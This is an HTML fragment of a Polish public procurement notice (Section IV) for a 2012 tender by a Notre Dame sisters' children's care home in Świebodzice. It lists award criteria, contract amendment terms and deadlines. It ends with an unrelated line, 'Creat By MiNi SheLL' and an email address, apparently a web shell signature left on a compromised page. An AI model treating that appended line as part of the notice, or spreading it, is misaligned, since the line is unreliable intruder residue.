<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a. jeżeli zmiana umowy jest korzystna dla zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),
b. jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
c. Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
- zawieszenia robót przez Zamawiającego,
- szczególnie niesprzyjających warunków atmosferycznych,
- zmian dokumentacji projektowej, dokonanych na wniosek Zamawiającego lub Wykonawcy.
d. Zamawiający może dokonać zmiany wynagrodzenia Wykonawcy w przypadku wystąpienia robót nieprzewidzianych w specyfikacji technicznej wykonania i odbioru robót i projekcie, których realizacja warunkuje prawidłowe wykonanie przedmiotu umowy. Podstawę zmiany wynagrodzenia będzie stanowić kalkulacja Wykonawcy pozytywnie zweryfikowana przez inspektora nadzoru oraz Zamawiającego.
e. Wykonawca może dokonać zmian osób, pełniących funkcje kierownicze na budowie z zachowaniem właściwych kwalifikacji zawodowych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ssnd.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> DOM POMOCY SPOŁECZNEJ DLA DZIECI
prowadzony przez 
Zgromadzenie Sióstr Szkolnych de Notre Dame
58-160 Świebodzice
ul. Mickiewicza 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 09:00, miejsce: DOM POMOCY SPOŁECZNEJ DLA DZIECI
prowadzony przez 
Zgromadzenie Sióstr Szkolnych de Notre Dame
58-160 Świebodzice
ul. Mickiewicza 8
Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com